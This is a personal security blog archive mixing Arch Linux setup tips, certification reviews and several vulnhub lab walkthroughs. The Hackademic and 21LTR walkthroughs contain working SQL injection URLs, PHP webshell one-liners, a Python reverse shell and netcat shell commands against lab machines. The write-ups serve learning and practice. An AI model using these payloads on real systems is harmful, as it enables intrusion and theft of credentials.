April 15, 2018

Install Arch Linux with encryption, secure boot and manual tweaking

   Today I will share my guide that I used for Arch installation. Obviously, there are a lot of resources, where you can find installation instructions, but here I would like to share my tips. Obviously, all related links will be included in this post. 
   
Our goal: 
  • UEFI Arch installation on encrypted volume + /boot also should be encrypted
  • enable and use secure boot with own keys on laptop
  • do post installation hardening
  • installation steps for Gnome without unneeded software

 

Installation


   All installation instructions can be found in official Arch Linux wiki (https://wiki.archlinux.org/index.php/installation_guide). The only thing is that you need to go through each wiki article to compile your own installation guide. I used this guide as a starting point (https://grez911.github.io/cryptoarch.html). I don't see any value in copy-pasting someone's guide here fully. The only difference I had is that I don't have partition for swap, as my laptop has 16 GB of RAM. Also I installed /boot on ext3 filesystem. 
  Another guide to consider is https://headcrash.industries/reference/fully-encrypted-archlinux-with-secure-boot-on-yoga-920/. There you can find specifics about btrfs and Yoga 920 installation.

Secure Boot 

 

   You can start reading about secure boot from wiki - https://wiki.archlinux.org/index.php/Secure_Boot. If you really want to understand what is going on in system I highly recommend go through this article https://bentley.link/secureboot/ and manually create everything. However, for automation you can use tool from github (https://github.com/xmikos/cryptboot) which is described in "Secure Boot" section from second installation guide on Yoga. After finish you can check whether secure boot is active by using this command: od -An -t u1 /sys/firmware/efi/efivars/SecureBoot-XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX. To get right value of XX, just use tab completion. Last digit should be 1.

Post installation hardening

 

  After installation finished I went through hardening. I will advise to go through wiki page - https://wiki.archlinux.org/index.php/Security. When I read about kernel hardening, I decided to install linux-hardened package, using this guide - https://thacoon.gitlab.io/articles/2017-07/arch-linux-hardened-kernel.html. It broke system for me as there were no kernel module for fat to proceed with boot. I found that I was not alone with my problems - https://flameeyes.blog/2011/09/12/hardened-and-efi-aren-t-buddies/. As for now I just wait for new releases. After all hardening I used tool called Lynis for audit (https://cisofy.com/lynis/). I found this sufficient enough to have a better level of security.


Post installation tips

 

   Well, now you can install anything you want in your new system. Pretty good list can be found in official wiki - https://wiki.archlinux.org/index.php/list_of_applications For decent terminal fonts I used this package - https://www.archlinux.org/packages/community/any/awesome-terminal-fonts/.
   As a desktop environment I prefer gnome, but I don't like loads of software which will be installed together with gnome. I found this conversation in reddit helpful, especially comment about what name stands for what software - https://www.reddit.com/r/archlinux/comments/3q98sf/gnome_without_the_bloat_what_is_neccesary/cwd8rj8/?st=jg194hew&sh=c96834de
 

January 21, 2018

OSCP course and exam overview

   There is a good proverb saying: "Later is better than never". Loads of people asking me about my OSCP experience and thoughts, so I decided to share it here. There are plenty of reviews with book/lab/exam details, so I would not copy/paste it. This review will be more about my experience and thoughts. I passed exam in October 2015 using first attempt. I know that exam and course change a lot since that time, but still I hope someone will find my review valuable.


Introduction

   To tell the truth certifications in infosec suck. It is very hard to follow rapid growth in industry and address modern concepts in courses. Before Offensive Security there were no hands-on certification. I find myself this situation quite strange, as vendors check you hands-on skills with bunch of questions. Even if we put aside endless dumps available in Internet, I think practice skills can be evaluated only by practice.


Lab environment

   I decided to take OSCP to challenge and improve my skills and out-of-the-box thinking. This is a self-study entry-level course from OffSec. They don't test your knowledge level when you sign-up for the course. Study will require loads of time and effort from student. I decided to buy my lab for 3 months and owned every machine out there.
   So I started with a book, I solved exercises and put them in my future lab report appendix. Frankly this book is just a good intro in what you will need while owning machines in lab. All basic techniques can be found there. OffSec is not a course, where they will guide you through all machines, it is up to you. They just provide you with some vectors to consider.
   While fighting with lab I struggled a lot. The most frustrating thing for me was that I knew that machine is vulnerable, but can't find where. In real pentest you never know beforehand that you target is actually vulnerable. I was stuck so many times. There was an IRC chat where you can discuss your problems with OffSec stuff. In my time the most common answer was: "Enumerate more". Now I am very thankful for this, as only persistence and suffering will help you to find out the truth. Since that time I know that there is no such a thing as "I tried to hack it for a long time". Patience is really important in our job. Pentest is not a bunch of tricks to try against target, it is more like a proper mindset and joy of solving puzzles.
   During lab time I did not do post-enumeration after rooting the box and it caused me pain when I was sitting in lab with only client-side boxes. I wasted 2 days just to go through all owned boxes to find necessary information to progress further. In lab you can find some neat stuff to play with such as Oracle, small domain environment, various OS versions. You will master privilege escalation, pivoting, trivial AV bypass, client-side exploitation. I improve my Metasploit skills, diving into how it is actually working. Admin network was a pleasure to play with. At the end I spent around 3 days to create full lab report with evidence and planned my exam.

Exam

   As I can't reveal details of exam and loads of things were written in other reviews I will just summarize my wins and fails. So I started exam with buffer overflow machine and got 25 points pretty quickly. Then I got 2 limited shells on other 2 machines. And then I stuck, really stuck. I was sitting from 14-00 till 01-00 with no luck. I felt myself miserable and went for a quick nap with heavy heart. However, at 7-00 I got up and in 2 hours I rooted Linux box for 20 points. I ignored 10 point box as I found worthless to spend time on such a low target. Then in next 2 hours I got rest of 2 machines, finishing 15 minutes before deadline. I started to dance and forgot to submit proof.txt in online system. Luckily I had all screenshots to prove rooting.
   After 2 days I received passing confirmation.

Closing thoughts and critics

   I personally found OSCP as a great entry level challenge. I vote for hands-on testing instead of paper-based exams in all forms. I heard opinions that playing with OSCP lab is not the same as a performing assessment, so it is not relevant for getting pentest job. I will agree with this only in a small thing: here you don't report all these informational bugs/missing best practices. Also you don't care much about environment stability, as you can always revert the machine. But everything else in lab and exam is quite close to real life, also course encourages you to research and study more, improves your personal qualities which will help in developing pentester career.
   When I do hiring, I personally consider OSCP as an advantage. Obviously, getting OSCP will not promote you to senior tester in a moment, but it would be a good base to start building technical career in sphere of legal hacking.  

September 19, 2017

Binary protocol inspection

   Sometimes during testing you need to observe traffic between endpoint and server. Also communication protocol can be proprietary, with no TLS wrapping. So to sniff and see what is going on you need to make some changes. In next few lines I will explain how to make a transparent bridge on L2.

   Here is a scheme how to connect yourself and other devices for convenient sniffing:)

endpoint --------> my switch ------------>my laptop -------->server

   So endpoint and my laptop's first adapter are connected to switch. My second adapter is connected to server. To create bridge I use brctl:

brctl addbr vinegrep - create bridge with name vinegrep

brctl addif vinegrep eth0 - add interface eth0 to bridge

brctl addif vinegrep eth1 - add interface eth1 to bridge


Launch wireshark and enjoy observation:)

   Let's make task a bit more difficult. New goal: intercept traffic and try replay attack. The previous part from above is still relevant as a first step. So next, assign IP address to bridge. Then I load br-netfilter kernel module and force that all traffic will be intercepted by iptables:

ebtables -t broute -A BROUTING -p ipv4 -i vinegrep -j DROP

   As a next step I need to create a rule that will forward traffic to my interception proxy. My proxy is listening on port 5555 and server is using tcp port 2608. 

iptables -t nat -A PREROUTING -i vinegrep -p tcp --dport 2608 -j REDIRECT --to 5555

   Now the most interesting part: proxy. There are not many software to choose. I found three options:

  1. NoPE plugin for Burp (https://github.com/summitt/Burp-Non-HTTP-Extension)
  2. binproxy by NCC (https://github.com/nccgroup/BinProxy)
  3. Trudy VM (https://github.com/praetorian-inc/trudy)
I choose NoPE plugin. There is a good video how to use it here - https://www.youtube.com/watch?v=4K0ZhWImtdw. In my case I did not use DNS, just intercepted packet, sent it to repeater and flood server. Primitive replay attack.


May 21, 2017

Hackademic RTB2 Walkthrough

   Today I will write a small review about intermediate level challenge Hackademic RTB2. You can download it from awesome vulnhub - https://download.vulnhub.com/hackademic/Hackademic.RTB2.zip

1. Reconnaissance 


As usual I started with netdiscover:


Next step was to scan ports:


2. Enumeration


In reality I spent a bit of time as port 80 did not reveal anything, port 666 was filtered. I used tool called knock-knock (https://github.com/pan0pt1c0n/knock-knock). After running it I saw port 666 as open. I examined source code of the page and it was shown as Joomla. I enumerated target more using metasploit module for Joomla plugins as it is quite often that plugins are vulnerable.

3. Exploitation

I was right: sectionid was vulnerable to SQL injection. As a next step I entered quote to verify whether it was a true:


As a next step I reviewed Joomla documentation to understand in what table user hashes are stored. I did hands-on SQL Injection exploitation instead of using sqlmap. I revealed field that was suitable for data exfiltration, enumerated tables and etc. I used this request to extract information about users:
http://192.168.57.102:666/index.php?option=com_abc&view=abc&letter=AS&sectionid=1%20union%20select%201,concat(username,0x20,password)%20from%20jos_users--

This gave me hashes:


I cracked hashes using Joomla_cracker.pl from https://gist.github.com/cobra-tn/2304218. Cracked hashes did not give me any new footpath. So I decided to utilize another SQLi option - retrieve files. By default Joomla configuration file located in web root. I assumed that /var/www was default path. After I retrieved file I tried "root" username and password to login in phpMyAdmin.


I was able to login. Then I spent some time to create limited shell. I used this video as an example: https://worldhack3r.wordpress.com/2013/05/06/upload-shell-in-phpmyadmin/. To tell long story short: I created database and table in MySQL. Then I used INTO OUTFILE MySQL command to create PHP shell in web root:
SELECT "<? system($REQUEST['cmd']); ?>" INTO OUTFILE "/var/www/cmd.php"


Then I used this shell to create connection back to my machine using python.

192.168.57.102:666/cmd.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.57.101%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

4. Privilege escalation

After quick enumeration I tried several kernel exploits. Machine was rooted using "RDS socket" exploit - https://www.exploit-db.com/exploits/15285/. I uploaded exploit code using wget to /tmp, compiled with default gcc and got root.


Conclusions

In general machine was not difficult, there were only few tricky moments to overcome:
1. port knocking - understand that it is in use and find ways to bypass
2. use SQL injection not only to dump hashes but also enumerate files on filesystem
3. shell in phpMyAdmin

May 2, 2017

SLAE compilation problem

   This is a quick note about how I overcame some compilation problems during my SLAE course. Review about the course will be soon. So when I tried to compile shellcode that simple spawn a shell using code that was provided in videos I faced: "Program received signal SIGSEGV, Segmentation fault." I checked everything not once, everything was OK, no stupid typos and stuff like that. So next after some googling I found 2 questions on stackoverflow with similar problem. Problem was that in current systems all .text area are marked read only by default. 

1. First advice was to use -N option while linking: ld -N shellcode.o -o shell (http://stackoverflow.com/questions/13777445/execve-shellcode-writing-segmentation-fault/13777931)
2. Second option is to use gcc with -omagic option: gcc --static -g -Wl,--omagic -o shellc shell.c (http://stackoverflow.com/questions/27581279/make-text-segment-writable-elf)

   Both ways were working as a charm.

March 12, 2017

VMware Workstation + Archlinux = nightmare

Hi all,

This is a quick one. I think lots of active Arch users struggle a lot with every kernel update to run VMware Workstation. Unfortunately awesome vmware-patch from AUR (https://aur.archlinux.org/packages/vmware-patch/) not always helpful.

Here is some advise how to fight against several errors:

1. Error: /usr/lib/vmware/modules/source/vmmon-only/linux/hostif.c:1165:13: error: too many arguments to function ‘get_user_pages’

I saw this after kernel upgrade to 4.7. I used this link (https://communities.vmware.com/thread/536705?tstart=0) with solution to recompile required modules.

2. Errors: /vmmon-only/linux/hostif.c:1592:47: error: ‘NR_ANON_PAGES’ undeclared (first use in this function)
and
/vmnet-only/netif.c:468:7: error: ‘struct net_device’ has no member named ‘trans_start’

These 2 errors you can see after upgrade to 4.8. Here is handy solution with sed:
https://sysadmin.compxtreme.ro/vmware-modules-arch-linux-kernel-4-8-13/

3. Error: /tmp/modconfig-HDxzxN/vmmon-only/linux/hostif.c:1166:13: error: too few arguments to function ‘get_user_pages_remote’

This error you will see after upgrade to 4.9. Here is a thread about this error https://communities.vmware.com/thread/552232 with solution. You can use script from TobInover to fix an issue.

I wish all the best, waiting for new kernel updates:)

Hackademic RTB1

   Here is the time for another walkthrough - Hackademic RTB1.
You can download iso from awesome vulnhub -  https://www.vulnhub.com/entry/hackademic-rtb1,17/

1. As usual we started with netdiscovery:


2. Nmap was the next step:


3. I spent some time on web server and found out that it used outdated wordpress. So next step was to run WPScan.


I tried both SQL Injections from list but no luck. So I went through different parameters to find maybe there were other vulnerabilities. I found out that cat parameter was vulnerable. Instead of using sqlmap I did initial steps myself. I used UNION SELECT to reveal amount of columns:

http://192.168.57.101/Hackademic_RTB1/?cat=1 and sleep(0) UNION SELECT 1,2,3,4,5

I revealed that there were 5 columns and second column had varchar type. The tricky part here is to understand why you need to add sleep(0):)
If you stuck, see a good video from ub3rsec - https://ub3rsec.github.io/pages/2016/hackademic-rtb1.html about manual SQL Injection.

4. Extracted user information from DB using sqlmap:

sqlmap -u 'http://192.168.57.101/Hackademic_RTB1/index.php?cat=1' -T wp_users --dump

Also sqlmap suggested to run dictionary attack against extracted hashes and successfully cracked them all:


5. User GeorgeMiller had admin privileges in wordpress. I used this link to login: http://192.168.57.101/Hackademic_RTB1/wp-admin/.
Next step was to enable file upload functionality in Miscellaneous, allowing PHP files to be uploaded:


6. To obtain shell I used PHP reverse shell from Kali webshells folder. I opened port on my machine and caught connection. Next step was to elevate privileges.
I spawned normal shell using python (python -c 'import pty; pty.spawn("/bin/sh")') and after a bit of enumeration found kernel version:


7. I used exploit suggester for this kernel. You can find this program here - https://github.com/PenturaLabs/Linux_Exploit_Suggester.
The output was:


I tried several exploits before succeeded with rds.
I ran python built-in web server on my machine using: python2 -m SimpleHTTPServer 8080

8. I downloaded and compiled exploit on victim machine:


and got root:


   Thanks to p0wnbox.Team for this challenge.
 
   I think this box has intermediate level of difficulty, however if you do everything using only automated tools it would be much easier.

December 16, 2016

21LTR: Scene 1 Walkthrough

Today I will write my "21 LTR:Scene 1" walkthrough from https://vulnhub.com . You can download it here - https://www.vulnhub.com/?page=16#modal3download.
Also 2 write-ups are already available:

Firstly, g0tmi1k, thanks for awesome resource of fun! Secondly, I will show my steps to get in as a step by step list of commands, explanations and screenshots. Let's start.

Walkthrough


1. Find out vulnerable machine IP: netdiscover -i vboxnet2
2. Let's scan for open ports: nmap -sS -A -p 1-65535 192.168.2.120
It is always important to check all TCP/UDP ports, because it is quite common that some sysadmins think that port from high range is a good defense. Security through Obscurity! Here is the output:


3. I tried to login with anonymous credentials to ftp - no luck. I ran dirsearch.py to enumerate directories. Great tool, you can check it here - https://github.com/maurosoria/dirsearch. Tool found 3 directories with no valuable information there. If you have a web page - always examine source code. It can give you hints about software version and sometimes really expand attack surface. On http://192.168.2.120/index.php/login/ I found this:
4. I used this credentials to login FTP. There I found backup_log.php file. I tried to access this file using URL http://192.168.2.120/logs/backup_log.php and saw a page with recent backup reports. 


At this moment I was stuck for a while. From my OSCP experience I remembered one valuable advice: "Don't know what to do? Listen on what is going on the wire." The only change I did was IP. I used 192.168.2.240 because I saw this in report.

5. I launched wireshark and went for coffee. When I was back I saw this:


Victim tried to connect on port 10000. OK, let's launch nc -nlvp 10000.
After some period of time I saw some binary data received by nc. Before jumping in rabbit hole with received data, I tried immediately to connect to port 10001: nc -nv 192.168.2.120 10001. I got empty shell with no output. It looked like victim was executed something on 192.168.2.240 machine and then opened port 10001 for short period of time to receive results.

6. I tried to insert commands without success but then I executed backup_log.php one more time and saw this:


Let's try to insert PHP one-line webshell: <?php echo exec($_GET["cmd"]);?>
I always prefer to use reverse shell when it is possible, so I can navigate on vulnerable machine without inconvenience. Let's try netcat with -e option: http://192.168.2.120/logs/backup_log.php?cmd=nc -nlvp 2608 -e /bin/bash

7. We are in! We have apache privileges. Not too much really. Let's spawn full shell using python -c 'import pty;pty.spawn("/bin/bash")' By the way, here is an excellent cheat sheet how to spawn shell using different languages - https://netsec.ws/?p=337
Privilege escalation is always a tricky thing. I often start with enumeration and then go for kernel exploits. For enumeration I advice this article from g0tmi1k - https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
For exploitation attempts you can try this perl tool - https://github.com/PenturaLabs/Linux_Exploit_Suggester. It is quite accurate.

8. During enumeration I found archive in /tmp - backup.tar.gz. After first decompression I found it in media/backup/pxelinux.cfg.tar.gz. Let's see what we have in /media. USB_1 sounded as attached USB key. I found there ssh private key, located in /media/USB_1/Stuff/Keys. Also I enumerated users in /home folder.


9. I copied the id_rsa key and tried to bruteforce ssh using usernames from /home and copied key. I was lucky with hbeale. Next step for me is always to run sudo -l. It saves so much time. Here I found that I can run cat with no password check. I tried cat /etc/shadow and got hash for root password - $1$VW5E9DmD$deoML8uqU/4HaTmNmfM7G1. I ran john with rockyou dictionary to find out password. 3 seconds later I found that password was "formula1". 


Using su and password I got root privileges. Done!

Lessons Learned


Key to this machine is to understand how to use port 10001. Without passive reconnaissance you won't be successful. Also it is essential to dig into and enumerate accessible folders on the machine. Examining each folder can be boring, but you can also automate this using tools from here - https://github.com/reider-roque/linpostexp

Good luck in your research and mastering!





October 26, 2016

CompTIA Security+ certification review


Overview

   I will start my certification story with Security+. At the beginning of 2015 my wife and I decided to relocate from Russia somewhere in Europe, because technical security jobs in my city are at low demand with pretty shit salaries by the way. So one of the first steps for us was to convert my knowledge in something more recognizable all around the world. I read some reviews regarding different certifications and decided to start with CompTIA Security+. I knew that this certification is an entry level one for security, so I it didn't take much time to prepare. Another important reason was that English is not my native language, so I wanted to get a feel of enterprise security terms and approaches.
   I have quite weird thoughts about certification process itself. It is not rare that certification is used not for proving skills, just to move up for career ladder regardless what you know and your abilities. That is why I am a big fan of Offensive Security guys, their approach and frustration. Obviously for Security+ you can easily google dumps, but if you don't understand the actual material you will struggle a lot in feature. By the way price around 300$ is quite challenging in Russia I decided to pass exam myself as I did before in school and University. I was always bad in "copy-paste" way.
   I examined CompTIA site and found more details about themes:
  • Network Security - 21%
  • Compliance and Operational Security - 18%
  • Threats and Vulnerabilities - 21%
  • Application, Data and Host Security - 16%
  • Access Control and Identity Management - 13%
  • Cryptography - 11%
All questions were divided on these categories. 90 questions/90 minutes to complete exam. 900 points maximum, 750 to pass. Let's prepare.

Preparation

There were 2 books for Security+ preparation:

Both books were excellent preparation guide. Let's dig a bit in. Topics were quite similar, so I will speak about both books in general.
  1. Network Security. Here you will find all variety of topics about firewalls, IPS/IDS, VLAN, DMZ, NAT, protocols from different layers of TCP/IP stack and etc. In exam most of the questions in these domain would be about port numbers and associated protocols, effective security measures to lock down security on network level, wireless security.
  2. Compliance and Operational Security. This part is quite boring and annoying, but I can't but mention the fact that these topics would be very helpful for you when you will decide to ask security budget increase or buy new fancy useless security toy=) Disaster recovery, backup plans, incident response, risk management - understanding all these topics would be handy to speak with business. More interesting to read about physical security and security administration. Remember all abbreviations, what they mean and how technical stuff influence them.
  3. Threats and Vulnerabilities. I think most interesting topic in both books. You will dive in malware classification, application and general attacks, social engineering. Most questions from this category would be about choosing best way to mitigate some threat or to distinct one threat from another.
  4. Access Control and Identity Management. Here you will deal with authentication/authorization (802.1x, port security, RADIUS and etc), host-based security software, ways to improve security on endpoints. Most questions would be about how to implement these features to address specific threat in most effective way.
  5. Cryptography. Key concepts of symmetric and public key cryptography, hashing, most common protocols, limitations and recommended parameters to use. Also network protocols which use cryptography heavily would be described: IPSec, TLS, HTTPS and etc.

Exam

   My review would not be really full without my impression about exam. Actually it was not too bad. CompTIA gave you various number of situations and asked for best solution in this situation. 2 out of 4 answers were quite stupid, but to choose right one you will probably need to think a bit. It was all about choosing best variant. You need to remember 2 parameters from situation in your head to do right  choice. Also you can find performance-based questions, which were far away from practice. In one question you will probably found parts from different domains. For question examples-have a look at samples in books above.
   I spent 2 weeks to prepare for this exam. I did it in PearsonVue center. I used about 60 minutes to achieve 880/900, probably I missed 1 or 2 questions. My first step towards relocation was made.

Conclusion

This exam can prove your entry level of understanding security. It is not hard technical exam, more situation based. Obviously, good university would provide all necessary background to pass this exam quickly. If you are looking for Level 1 position or your first infosec job it is a good choice. With my current level of experience and knowledge I would not bother to recertify after expiration.

October 17, 2016

Share is fun!

   A lot of things happened since my last blog post. During last 2 years I could not find time to write a blog post=) Lie! However, now my wife and I raise 2 beautiful kids and we teach them that "share is fun". As you know, in order to show best example for kids you need to follow your own words. Let's get it started!

   I have a lot of material to share in my blog. I will try to write frequently, at least 2 times a week. I am going to cover different things:

  • my experience of passing Security+, CEH, OSCP, OSWP, OSCE, SANS GXPN. Also I hope to achieve SANS GREM and SLAE this year, so probably I will cover them too.
  • talk about Info Sec books, blogs and other resource I use to broad my knowledge. Unfortunately, there is not too much really good resources and books, so I will try to cover them.
  • describe interesting stuff that I face during my way in Info Sec. I am not going to copy/paste excellent materials from Corelan, fuzzy security and etc, but I am going to explain moments that was not clear for me during reading and I spent some time to research it.
  • create series of articles regarding Linux exploitation and some other things that is not clearly described in the Internet. Before starting something like this I will examine carefully available resources in order not to reinvent a wheel.

My main goal for this blog is to make it unique, interesting to read and valuable for different folks in Info Sec field.